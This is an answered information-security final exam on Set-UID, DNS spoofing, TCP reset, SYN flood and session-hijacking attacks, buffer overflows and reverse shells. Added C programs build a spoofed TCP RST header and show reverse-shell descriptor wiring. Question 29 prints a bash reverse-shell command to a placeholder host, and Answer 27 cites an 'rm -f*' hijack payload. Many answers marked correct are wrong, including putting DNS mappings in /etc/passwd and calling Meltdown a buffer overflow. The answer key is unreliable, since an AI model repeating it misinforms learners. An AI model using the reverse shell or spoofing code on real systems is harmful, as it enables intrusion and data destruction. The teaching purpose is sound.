Hubei University of Technology
2021 to 2022 Academic Year, 2nd Semester, Final Exam
Introduction of Information Security
Test Paper (TP No.: A)    ( ) Open-book / ( ) Closed-book

Student ID: 1911562106    Name: PARVEZ    Grade & Class: 19lc Software Engineering

Score table
Section:      I    II   III   IV   V   VI   VII   VIII   IX   X
Points:       20   10   30    40
Your result:                                        Total score:        Score checker:

Note:
I. Do not answer on the left part of the sealing line.
II. TSA and ID cannot be altered.
III. The student shall write TSA, ID, and Grade & Class in the corresponding blanks.
IV. If the paper is not clear, please ask the teacher for a new one.
Notice: if the Student ID, TSA (name) and Grade & Class are not filled in, are incomplete, or are written outside the sealing line, the paper is invalid.

I. Single-choice questions (2 points for each question, 20 points in total)

1. The Set-UID privilege mechanism allows users to run a piece of a program with ( C ) permissions.
   A. Program executor   B. Program owner   C. The root user   D. Normal user

2. In the Linux operating system, a process has access control rights as determined by the process's ( A ).
   A. Real User ID (RUID)   B. Effective User ID (EUID)   C. Reserved user ID   D. Root user ID

3. Race condition vulnerabilities usually occur ( D ).
   A. When a single process accesses a resource.
   B. When a single thread accesses a resource.
   C. When a single user accesses a resource.
   D. When multiple processes or threads access shared resources at the same time.

4. Meltdown and Spectre attacks are essentially a form of attack implemented using ( A ).
   A. Buffer overflow vulnerability
   B. Race condition vulnerability
   C. Set-UID privilege mechanism vulnerability
   D. Network protocol stack vulnerability

5. Meltdown and Spectre attacks take advantage of the ( A ) characteristics of the CPU when executing program instructions.
   A. Out of order   B. Access permission check   C. Encoding   D. Decoding

6. In the Linux operating system, the correspondence of DNS information is set in the ( C ) file.
   A. /etc/hosts   B. /etc/local.d   C. /etc/passwd   D. /etc/shadow

7. In a buffer overflow attack (32-bit operating system), the following ( C ) option does not serve as a valid jump address for the attacker.
   A. 0xbffff250   B. 0xbffff280   C. 0xbffff300   D. 0xbffff310
8. The program interface/library corresponding to the following ( A ) option cannot spoof network packets.
   A. Socket   B. Raw socket   C. PCAP library   D. All of the above options

9. A 4-byte integer 0xAABBCCDD is stored in a computer at the four memory addresses 0x1000, 0x1001, 0x1002, 0x1003 (starting from 0x1000). If the computer uses big-endian byte order, the wrong statement among the following is ( D ).
   A. 0xAA is stored at 0x1000   B. 0xBB is stored at 0x1001
   C. 0xCC is stored at 0x1002   D. 0xDD is stored at 0x1000

10. For a TCP Reset attack, the information NOT required to collect is ( D ).
   A. Source IP address/port   B. Target IP address/port
   C. TCP packet sequence number   D. Application-layer data

II. Judgment questions (1 point per question, 10 points in total. Please mark √ after a correct description and × after a wrong description.)

11. Once a program obtains privileges through the Set-UID mechanism, the program has super user (root user) privileges. ( √ )
12. In the Linux operating system, the user's password is stored in the /etc/passwd file. ( √ )
13. Race condition vulnerabilities usually occur between detection (Time Of Check) and use (Time Of Use) of a resource. ( √ )
14. When a piece of data is read multiple times from a memory address, the second read tends to be faster than the first, which is a phenomenon due to the properties of the CPU cache. ( × )
15. TCP Reset attacks can be effectively implemented on SSH connections. ( √ )
16. An attacker can successfully implement a TCP SYN flooding attack with a fixed source IP address. ( × )
17. Buffer overflow vulnerabilities can be avoided by using strncpy() and strncat(). ( √ )
18. The socket type of a network communication program based on the TCP protocol is SOCK_STREAM. ( √ )
19. In the Linux operating system, the privileged shell instruction for the program TEST is: $ sudo chmod 4755 TEST. ( √ )
20. The monitoring and forgery of data packets in ANY network can be realized using network packet sniffing and spoofing techniques. ( × )

III. Short answer questions (6 points for each question, 30 points in total)

21. Please briefly describe the process and principles of DNS deception attacks in a local network environment (local DNS attacks).

Answer 21:
Process of DNS deception:
DNS deception, meaning DNS spoofing, is a collective term for a variety of attack methods. The different methods are described below. The following diagram explains the basics of DNS spoofing.
[Diagram: basics of DNS spoofing, with steps d1, d2, h1, h2 and attack points A, B, C]
• d1. The client (e.g. the browser on the device) first requests the IP address for the host name example.com from the DNS server.
• d2. The client receives a response to the request, but it contains a fake IP address. The connection to the actual server for example.com is not established.
• h1. Instead, the client sends the request to the malicious host behind the faked IP address.
• h2. The malicious host returns what appears to be a legitimate website page to the client. However, the fake domain name is missing the security certificate, which makes the attack visible.
• (A, B, C): These are different attack points for DNS spoofing: on the client side or local router, on the network connection, and on the DNS server.

Principles of DNS deception:
Attackers use DNS deception, that is, DNS spoofing, for phishing and pharming attacks with the goal of intercepting sensitive user data. DNS spoofing makes the victim believe that they have ended up on a legitimate domain and uses the victim's trust to infect them with malware and infect their own system.

22. Please briefly describe the principle of the TCP reset attack combined with the information in the figure below.
[Figure: TCP reset attack, provided by the exam]

Answer 22:
Spoofed RST packet: the following fields need to be set correctly:
● Source IP address, source port
● Destination IP address, destination port
● Sequence number (within the receiver's window)

TCP Reset Attack on a Telnet connection:
[Screenshots]
TCP Reset Attack on SSH connections:
● If the encryption is done at the network layer, the entire TCP packet including the header is encrypted, which makes sniffing or spoofing impossible.
● But as SSH conducts encryption at the transport layer, the TCP header remains unencrypted. Hence the attack is successful, as only the header is required for the RST packet.
[Screenshot] And then check the TCP states before attacking.
[Screenshot] Launch the attack targeting the telnet server.

23. Please briefly describe the principle of the TCP SYN flooding attack combined with the information in the figure below.
[Figure: TCP SYN flooding, provided by the exam]

Answer 23:
A SYN flood (half-open attack) is a type of denial-of-service (DDoS) attack which aims to make a server unavailable to legitimate traffic by consuming all available server resources. By repeatedly sending initial connection request (SYN) packets, the attacker is able to overwhelm all available ports on a targeted server machine, causing the targeted device to respond to legitimate traffic sluggishly or not at all.

According to the information above, SYN Flooding Attack:
Idea: to fill the queue storing the half-open connections so that there will be no space to store the TCB for any new half-open connection; basically the server cannot accept any new SYN packets.
Steps:
● Do not finish the 3rd step of the handshake, as it will dequeue the TCB record.
● When flooding the server with SYN packets, we need to use random source IP addresses; otherwise the attacks may be blocked by the firewalls.
● The SYN+ACK packets sent by the server may be dropped because the forged IP address may not be assigned to any machine. If it does reach an existing machine, a RST packet will be sent out, and the TCB will be dequeued.
● As the second option is less likely to happen, TCB records will mostly stay in the queue. This causes the SYN Flooding Attack.
[Screenshot] SYN Flooding Attack results.
SYN cookies: using cryptographic hashing, the server sends its SYN-ACK response with a sequence number (seqno) that is constructed from the client IP address, port number, and possibly other unique identifying information. When the client responds, this hash is included in the ACK packet. The server verifies the ACK, and only then allocates memory for the connection.

24. Describe the functions performed by these two statements:

    read(5, data, 100);
    write(3, data, 100);

Answer 24:
The first line reads 100 bytes from the file represented by the file descriptor 5. The second line writes 100 bytes to the file represented by the file descriptor 3.

25. The ASLR (Address Space Layout Randomization) mechanism can make the buffer overflow attack more difficult to launch; please explain the reason.

Answer 25:
One of the critical steps in the attack is to find out the address of the malicious code. If the memory is not randomized, each time we run the program the address will be the same. This makes investigation easy. The ASLR technique changes that, so figuring out the address becomes difficult.
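The spoofed RST packet of Answer 22, the fields Question 10 says must be collected, and the big-endian byte order of Question 9 come together in the following C program. It is an added example, not part of the exam paper or the student's answers: it builds a 20-byte RST|ACK header carrying only the 5-tuple and the sequence number, computes the TCP checksum over the IPv4 pseudo header, and checks the "within the receiver's window" condition with 32-bit wrap-around. The IP addresses reuse Question 27's User and Server; the ports, sequence numbers and window size are constructed test values, and no packet is sent.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TCP_FLAG_RST 0x04
#define TCP_FLAG_ACK 0x10

/* Constructed test values (not from the paper): Question 27's Server and User
 * addresses, the telnet port and an arbitrary client port. */
#define SRC_IP   0x0a000245u   /* 10.0.2.69, the server the RST impersonates */
#define DST_IP   0x0a000244u   /* 10.0.2.68, the telnet client being reset */
#define SRC_PORT 23
#define DST_PORT 40000

/* Network byte order is big-endian, the layout Question 9 asks about:
 * most significant byte at the lowest address. */
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

/* One's-complement sum of 16-bit words, accumulated in 32 bits. */
static uint32_t sum16(const uint8_t *p, size_t n, uint32_t acc) {
    for (; n > 1; n -= 2, p += 2) acc += (uint32_t)((p[0] << 8) | p[1]);
    if (n) acc += (uint32_t)(p[0] << 8);            /* odd trailing byte */
    return acc;
}
static uint16_t fold(uint32_t acc) {
    while (acc >> 16) acc = (acc & 0xffffu) + (acc >> 16);
    return (uint16_t)~acc;
}

/* TCP checksum: 12-byte IPv4 pseudo header (src, dst, zero, protocol 6, length)
 * followed by the TCP segment itself. */
uint16_t tcp_checksum(uint32_t src_ip, uint32_t dst_ip, const uint8_t *seg, size_t len) {
    uint8_t pseudo[12];
    put32(pseudo, src_ip);
    put32(pseudo + 4, dst_ip);
    pseudo[8] = 0;
    pseudo[9] = 6;
    put16(pseudo + 10, (uint16_t)len);
    return fold(sum16(seg, len, sum16(pseudo, 12, 0)));
}

/* The condition behind "sequence number within the receiver's window" in
 * Answer 22: a receiver honours the RST only if
 * rcv_nxt <= seq < rcv_nxt + rcv_wnd, computed with 32-bit wrap-around. */
int rst_in_window(uint32_t seq, uint32_t rcv_nxt, uint32_t rcv_wnd) {
    return (uint32_t)(seq - rcv_nxt) < rcv_wnd;
}

/* Fill out[] with a 20-byte RST|ACK header holding exactly the fields listed in
 * Answer 22 and Question 10: 5-tuple plus sequence number, no payload.
 * Returns the header length. */
size_t build_tcp_rst(uint8_t out[20], uint32_t src_ip, uint16_t src_port,
                     uint32_t dst_ip, uint16_t dst_port, uint32_t seq, uint32_t ack) {
    memset(out, 0, 20);
    put16(out, src_port);
    put16(out + 2, dst_port);
    put32(out + 4, seq);
    put32(out + 8, ack);
    out[12] = 5 << 4;                                /* data offset: 5 words */
    out[13] = TCP_FLAG_RST | TCP_FLAG_ACK;
    put16(out + 14, 0);                              /* window: unused in a RST */
    put16(out + 16, tcp_checksum(src_ip, dst_ip, out, 20));
    return 20;
}

/* Receiver-side check: summing a segment that already carries its checksum
 * must give zero. Returns 1 if the segment verifies. */
int tcp_checksum_ok(uint32_t src_ip, uint32_t dst_ip, const uint8_t *seg, size_t len) {
    return tcp_checksum(src_ip, dst_ip, seg, len) == 0;
}

/* Builds the RST with the constructed values above and checks it the way the
 * client's TCP stack would; returns 1 on success. */
int spoofed_rst_example_ok(void) {
    uint8_t seg[20];
    uint32_t rcv_nxt = 1000, rcv_wnd = 65535, seq = rcv_nxt + 10;   /* inside window */
    if (!rst_in_window(seq, rcv_nxt, rcv_wnd)) return 0;
    if (build_tcp_rst(seg, SRC_IP, SRC_PORT, DST_IP, DST_PORT, seq, 0) != 20) return 0;
    if (seg[13] != (TCP_FLAG_RST | TCP_FLAG_ACK)) return 0;
    if (seg[0] != 0 || seg[1] != SRC_PORT) return 0;  /* port 23 in network order */
    return tcp_checksum_ok(SRC_IP, DST_IP, seg, 20);
}

int main(void) {
    uint8_t seg[20];
    build_tcp_rst(seg, SRC_IP, SRC_PORT, DST_IP, DST_PORT, 1010, 0);
    for (size_t i = 0; i < 20; i++) printf("%02x%s", seg[i], i == 19 ? "\n" : " ");
    printf("example ok: %d\n", spoofed_rst_example_ok());
    return 0;
}
```

A real spoofing tool would prefix this header with an IP header and hand it to a raw socket (Question 8, option B), which is where root privilege and the sniffed sequence number come in; the window check is why Answer 22 insists the sequence number be in range, since an out-of-window RST is silently dropped.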
IV. Analysis questions (10 points for each question, 40 points in total)

26. Someone has written the C code below (named stack.c).

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    int foo(char *str)
    {
        char buffer[100];
        strcpy(buffer, str);
        return 1;
    }

    int main(int argc, char **argv)
    {
        char str[400];
        FILE *badfile;

        badfile = fopen("badfile", "r");
        fread(str, sizeof(char), 200, badfile);
        foo(str);

        printf("returned Properly\n");
        return 1;
    }

(1) The following figure shows the relative storage locations of the main() function and the foo() function in the memory stack space. Please specifically correlate the parameter str of the foo function (represented as str), the variable buffer[] in foo() (represented as buffer[0] to buffer[99]), the foo function return address (represented as Return address), and the previous frame pointer (represented as previous frame pointer) with the corresponding areas A, B, C, D of the foo() stack frame in the figure, respectively.

[Figure: stack layout. From high address to low address: the main() stack frame, then the foo() stack frame divided into areas A, B, C, D (A at the highest address, D at the lowest); the stack grows toward the low address.]

(2) Does the stack.c code have a buffer overflow vulnerability? If so, explain the principle and process of the attack between the main() function and the foo() function in the memory stack (you can add pictures to clarify your point), and explain what measures can be taken to prevent this vulnerability according to what we have learned in class.
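Question 26 has no written answer on this paper. The following C program is an added example, not the exam's or the student's code: it models the foo() frame of part (1) and rejects the oversized badfile input of part (2). The offsets assume a 32-bit x86 frame with 4-byte words and no compiler padding between buffer[] and the saved frame pointer (the paper names neither compiler nor flags, so this is an assumption), and the 200-byte input is constructed to mirror fread(str, sizeof(char), 200, badfile).

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE  100   /* char buffer[100] in foo() */
#define READ_SIZE 200   /* fread(str, 1, 200, badfile) in main() */

/* Byte offsets, measured upward from buffer[0], of the regions the figure labels
 * A..D.  Assumption (the paper names no compiler or flags): 32-bit x86, 4-byte
 * words, no padding between buffer[] and the saved frame pointer. */
struct foo_frame {
    size_t buffer;      /* D: buffer[0] .. buffer[99], lowest address */
    size_t saved_fp;    /* C: previous frame pointer (main's ebp) */
    size_t ret_addr;    /* B: return address into main() */
    size_t arg_str;     /* A: the argument str, pushed by main() */
};

struct foo_frame model_foo_frame(size_t buf_size, size_t word) {
    struct foo_frame f;
    f.buffer   = 0;
    f.saved_fp = buf_size;
    f.ret_addr = buf_size + word;
    f.arg_str  = buf_size + 2 * word;
    return f;
}

/* How much strcpy() must copy before region B is completely overwritten: the
 * buffer, the saved frame pointer and the return address itself. */
size_t bytes_to_overwrite_ret(size_t buf_size, size_t word) {
    return buf_size + 2 * word;
}

/* strcpy() copies up to and including the NUL, so n data bytes need n + 1 bytes
 * of destination: any NUL-free input of 100 bytes or more overflows buffer[]. */
int input_overflows_buffer(size_t n, size_t buf_size) {
    return n + 1 > buf_size;
}

/* Hardened foo(): the same copy, bounded by the real destination size, with an
 * explicit reject instead of the silent truncation strncpy() alone would give.
 * Returns 1 on success, 0 if the input does not fit. */
int foo_safe(const char *str, size_t len) {
    char buffer[BUF_SIZE];
    if (len >= sizeof buffer)
        return 0;
    memcpy(buffer, str, len);
    buffer[len] = '\0';
    return 1;
}

/* main()'s logic from stack.c with the fix: the byte count read from badfile is
 * kept and checked before anything is copied.  Returns 1 when foo() returned
 * properly, 0 when the input was rejected. */
int process_badfile_bytes(const unsigned char *data, size_t n) {
    if (input_overflows_buffer(n, BUF_SIZE))
        return 0;
    return foo_safe((const char *)data, n);
}

/* Constructed inputs standing in for the contents of badfile. */
int demo_rejects_200_byte_badfile(void) {
    unsigned char data[READ_SIZE];
    memset(data, 'A', sizeof data);
    return process_badfile_bytes(data, sizeof data) == 0;
}

int demo_accepts_short_badfile(void) {
    const char *data = "hello";
    return process_badfile_bytes((const unsigned char *)data, strlen(data)) == 1;
}

int main(void) {
    struct foo_frame f = model_foo_frame(BUF_SIZE, 4);
    printf("D buffer[0]      at +%zu\n", f.buffer);
    printf("C saved fp       at +%zu\n", f.saved_fp);
    printf("B return address at +%zu\n", f.ret_addr);
    printf("A str            at +%zu\n", f.arg_str);
    printf("bytes to clobber return address: %zu\n", bytes_to_overwrite_ret(BUF_SIZE, 4));
    printf("200-byte badfile rejected: %d\n", demo_rejects_200_byte_badfile());
    return 0;
}
```

On that model region D is buffer[0..99], C the previous frame pointer at +100, B the return address at +104 and A the parameter str at +108, which is why the 200 bytes strcpy() copies in stack.c run past the return address. The length check before the copy is the fix shown here; the paper's Question 17 (strncpy/strncat) and Question 25 (ASLR) name two further countermeasures.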
27. As shown in the figure below, the legitimate user User (IP address: 10.0.2.68) is connecting to the server Server (IP address: 10.0.2.69) through telnet (a TCP-based connection), when the Attacker (IP address: 10.0.2.70) successfully launches a TCP Session Hijacking attack on this telnet connection. User then finds that after 8 characters have been input on the telnet terminal, he cannot enter any information anymore, and the telnet terminal crashes. A network packet sniffing tool (Wireshark, for example) shows that after the attack is successfully launched, any packets User sends to Server are discarded by Server, and any packets Server sends back to User are discarded by User as well.
[Figure: TCP session hijacking between User (10.0.2.68), Server (10.0.2.69) and Attacker (10.0.2.70), provided by the exam]
(1) Please analyze and explain the cause of this phenomenon, that is, the principle of the TCP Session Hijacking attack;
(2) Why did the current telnet program freeze and then crash after 8 characters had been input on the telnet terminal? What impact will the successful attack have on the Server after this attack?

Answer 27(1):
TCP/IP Hijacking is when an authorized user gains access to a genuine network connection of another user. It is done in order to bypass the password authentication which is normally the start of a session.
Firstly, User (10.0.2.68) and Server (10.0.2.69) are normally connected, and their sequence numbers are X and Y.
Then the Attacker (10.0.2.70) comes there and tries to add some data with the payload (rm -f*/n), payload: 8.
And then the Server's acknowledgement is changed to X+8. So the TCP Session Hijacking attack is executed.

Answer 27(2):
Here, the Attacker (10.0.2.70) adds some data with the payload (rm -f*/n), payload: 8. Actually this code tries to delete all the files on the server.
And also it changes ACK: X+8, payload: 10.
The packet sent to User from Server is not received by User because it has already changed, so User drops the packet and sends another ACK to Server.
Here, User sends to Server payload: 1 and Seq: X, but Server finds it strange; Server wants to receive X+9 because Server sent X+8. But now it is strange, so Server drops this packet.
Now the full process will continue again and again. No one can receive any packet. So the hijacking attack is successful.
The Attacker (also a user) sends this illegal instruction (rm -f*/n), payload: 8.
User's and Server's ACKs have changed; for that reason both drop all packets. And also the attacker tries to delete all the files on this server. So TCP Hijacking is a very dangerous attack.

28. Assuming that machines A and B are in the same local network (10.3.2.0/24), A sends out forged packets onto the network and B is monitoring the packets in the local network. B observes the following: B can sniff packets with destination IP address 1.2.3.4 from A, but B cannot sniff packets with destination IP address 10.3.2.30 from A. Please answer the following questions:
(1) For B, what are the conditions to successfully sniff the information of the local network?
(2) Please explain the cause of the above phenomenon.

Answer 28(1):
We spoof a packet using the Victim's IP as the source IP address and the UDP server as the destination IP address. We transmit this packet to the UDP server, and the server responds with an extremely large packet to the person in question. If we send a large number of such packets, this is an assault on the wounded individual's system.

Answer 28(2):
If the packet destination is 10.3.2.30, the receiver is on the same network. Before the packet is sent out, the sender's machine will send out ARP requests, trying to get the MAC address of the receiver. The receiver machine very likely does not exist on the network (or it is not up), so nobody will answer the ARP request. Without knowing the MAC address of the receiver, the spoofed packet will not be sent out. That is why Machine B will not see the spoofed packet. If the packet destination is a host outside of the network, then the sender needs to send the spoofed packet to a router. In its ARP request, it will ask for the router's MAC address. Obviously, the router is up, so the spoofed packet will be sent out.

29. With the help of the network, the attacker can obtain the shell or root shell of the remote server (Linux operating system-based) through the reverse shell attack, and then get full control of the server. The typical reverse shell instruction is as follows:

    /bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"

(1) Please explain the meaning of 0, 1, 2, >, <, & in the above statement;
(2) What does the attacker need to do on his machine in order to successfully get the shell output from the server side? And please explain the meaning of /dev/tcp/server_ip/9090;
(3) Combined with the above statement, explain the implementation process of the reverse shell attack;
(4) Combined with the relevant knowledge learned in our class, what attacking methods can be used to successfully transmit and execute the above reverse shell instruction on the server side?

Answer 29(1):
The meanings of 0, 1, 2, >, <, & in the above statement are given below:
0 = standard input
1 = standard output
2 = standard error
>, < = redirection
& = redirect standard input

Answer 29(2):
The interpretation of the /dev/tcp special device and the redirection symbols is conducted by the outer shell, shell1. Since /dev/tcp is a built-in virtual file for bash only (other shells do not recognize it), shell1 must be bash. The inner shell program shell2 does not need to be bash; other shell programs also work.

Answer 29(3):
Implementation process of the reverse shell attack:
Creates a copy of the file descriptor oldfd, and then assigns newfd as the new file descriptor.
The reverse shell is executed via injected code.
We can't assume that the target machine runs bash.
Run bash first:
[Screenshot]

Answer 29(4):
Remote DNS Cache Poisoning Attack methods can be used to successfully transmit and execute the above reverse shell instruction on the server side.
The local DNS attack described in the previous section has a limitation, i.e., in order to sniff the victim's DNS query, the attacker machine and the victim machine must be on the same LAN. This poses a challenge to remote attackers, who are not able to see the DNS query. There are two data items in a DNS query that are hard to get for remote attackers. The first item is the source port number in the UDP header. The DNS query is sent via a UDP packet, the source port number of which is a 16-bit random number. The second item is the 16-bit transaction ID in the DNS header. A spoofed reply must contain the correct values for these two numbers; otherwise, the reply will not be accepted. Without being able to sniff the query, attackers can only guess these two numbers. The chance is one out of 2^32 for each guess. If an attacker can send out 1000 spoofed queries in a second, it takes 50 days to try 2^32 times. If an attacker uses a botnet of a thousand hosts to launch the attack, it only takes 1.2 hours.
The above hypothetical attack has overlooked the cache effect. Because we have to guess both the transaction ID and the source port number, it will be hard for us to succeed on the first try. If we fail once, the real reply will arrive and be cached by the targeted local DNS server. To make another try, we have to wait for the server to send out another DNS query, but unfortunately, since it already knows the IP address from its cache, it will not send out a query for the same name until the cache times out. Such a cache effect forces attackers to wait before they can make another attempt. The waiting time can be hours or days, making remote DNS cache poisoning attacks unrealistic.
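The redirections in Question 29's command and the dup2() description in Answer 29(3) can be reproduced offline. The C program below is an added example, not part of the exam or the student's answers: it performs the same three dup2() calls the shell performs for "> /dev/tcp/server_ip/9090 0<&1 2>&1", but over a socketpair() standing in for the TCP connection to the attacker's listener, with three descriptors opened on /dev/null standing in for the shell's own 0, 1 and 2 so the demo does not touch this process's stdio; the prompt text and the id command are constructed sample bytes.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>

/* What bash does for "> /dev/tcp/ip/port 0<&1 2>&1" before it execs bash -i,
 * written with dup2(): the target descriptor is closed if open and made to refer
 * to the same open file description as the source, the operation Answer 29(3)
 * describes.  Order matters: 0<&1 only picks up the socket because ">" has
 * already moved descriptor 1 onto it. */
int wire_stdio_to_socket(int sock, int fd_in, int fd_out, int fd_err) {
    if (dup2(sock, fd_out) < 0) return -1;    /* >    : stdout -> socket */
    if (dup2(fd_out, fd_in) < 0) return -1;   /* 0<&1 : stdin  <- socket */
    if (dup2(fd_out, fd_err) < 0) return -1;  /* 2>&1 : stderr -> socket */
    return 0;
}

/* Stream sockets may split a read; loop until n bytes have arrived. */
static int read_exact(int fd, char *buf, size_t n) {
    size_t got = 0;
    while (got < n) {
        ssize_t r = read(fd, buf + got, n - got);
        if (r <= 0) return -1;
        got += (size_t)r;
    }
    return 0;
}

/* Offline run of the plumbing.  A socketpair() stands in for the TCP connection
 * to /dev/tcp/server_ip/9090; three descriptors opened on /dev/null stand in
 * for the shell's original 0, 1 and 2.  Returns 1 if writes to the fake stdout
 * and stderr both arrive at the "attacker" end and bytes written by the attacker
 * can be read from the fake stdin. */
int reverse_shell_plumbing_ok(void) {
    int sv[2], fd_in, fd_out, fd_err, ok = 1;
    char buf[32];

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return 0;
    const int victim = sv[0], attacker = sv[1];
    fd_in  = open("/dev/null", O_RDONLY);
    fd_out = open("/dev/null", O_WRONLY);
    fd_err = open("/dev/null", O_WRONLY);
    if (fd_in < 0 || fd_out < 0 || fd_err < 0) ok = 0;

    if (ok && wire_stdio_to_socket(victim, fd_in, fd_out, fd_err) < 0) ok = 0;

    /* constructed sample: a prompt on "stdout" and an error on "stderr" */
    if (ok && write(fd_out, "bash-5$ ", 8) != 8) ok = 0;
    if (ok && write(fd_err, "err\n", 4) != 4) ok = 0;
    if (ok && read_exact(attacker, buf, 12) < 0) ok = 0;
    if (ok && memcmp(buf, "bash-5$ err\n", 12) != 0) ok = 0;

    /* constructed sample: a command typed by the attacker reaches "stdin" */
    if (ok && write(attacker, "id\n", 3) != 3) ok = 0;
    if (ok && read_exact(fd_in, buf, 3) < 0) ok = 0;
    if (ok && memcmp(buf, "id\n", 3) != 0) ok = 0;

    if (fd_in >= 0) close(fd_in);
    if (fd_out >= 0) close(fd_out);
    if (fd_err >= 0) close(fd_err);
    close(victim);
    close(attacker);
    return ok;
}

int main(void) {
    printf("reverse shell fd plumbing works: %d\n", reverse_shell_plumbing_ok());
    return 0;
}
```

In the real attack the attacker first starts a listener on port 9090 (Answer 29(2)); bash -i then runs with all three standard descriptors already pointing at the socket, so every prompt and error message travels to the attacker and every byte the attacker types is read as shell input, which is what makes the single command line in Question 29 a complete reverse shell.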
